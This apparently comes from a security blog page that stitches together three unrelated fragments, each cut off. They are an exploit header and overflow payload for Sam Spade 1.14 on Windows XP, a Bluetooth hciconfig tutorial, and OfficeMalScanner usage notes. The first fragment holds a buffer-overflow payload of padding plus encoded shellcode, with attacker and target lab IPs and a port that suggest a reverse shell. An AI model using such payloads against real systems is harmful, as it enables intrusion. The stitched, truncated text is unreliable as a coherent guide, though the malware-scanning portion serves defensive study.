aLt's Security Blog

# Exploit Title: SAMSPADE 1.14 BUFFER OVERFLOW # Date: 10-12-2013 # Exploit Author: VISHAL MISHRA & NIDHI VERMA # Vendor Homepage: http://www.samspade.org/ # Software Link: http://www.majorgeeks.com/mg/getmirror/sam_spade,1.html # Version: 1.1.4 (beta) # Tested on: WINDOWS XP(sp2) TARGET: windows xp(sp2) ip:192.168.117.129 ATTACKER: backtrack     ip:192.168.117.131      PORT:443 Payload: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAj4?wTYIITYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlXhM

Step1 : $hciconfig Like ifconfig and iwconfig for bluetooth we have hciconfig that enumerate bluetooth interfaces in an system with a little info about that card like MAC,MTU and interface name. hciconfig Step2 : $hciconfig -a hci0 So now we known we have a bluetooth interface card hci0.It may be anyone hci0,hci1 etc. Now as you can see below in the output that this bluetooth device is using OS name as its name own name. We will change this info so that some person might not enumerate any info about our bluetooth device.                                                Class is a 24 bit or 6 hex number based identity for bluetooth devices. Class entity defines that bluetooth device is of which hardware class i.e 1) 0x78020c is class of Phone/Smart phone, 2) 0x6e0100 is class of computer etc. Now will try to change this default class and name of our bluetooth device. hciconfig -a hci0 Step3:   $hciconfig -a hci0 features This command will tell what features our card

+------------------------------------------+ |           OfficeMalScanner v0.61         | |  Frank Boldewin / www.reconstructer.org  | +------------------------------------------+ Usage: -------- OfficeMalScanner <PPT, DOC or XLS file> <scan | info> <brute> <debug> Options: scan    - scan for several shellcode heuristics and encrypted PE-Files info    - dumps OLE structures, offsets+length and saves found VB-Macro code inflate - decompresses Ms Office 2007 documents, e.g. docx, into a temp dir Switches: (only enabled if option "scan" was selected) brute - enables the "brute force mode" to find encrypted stuff debug - prints out disassembly resp hexoutput if a heuristic was found If you use ubuntu with wine on it then type following command in terminal "wine cmd.exe" to reach a window prompt from where you can run OfficeMalScanner OfficeMalScanner Output OfficeMalScanner in Scan Mode OfficeMalScann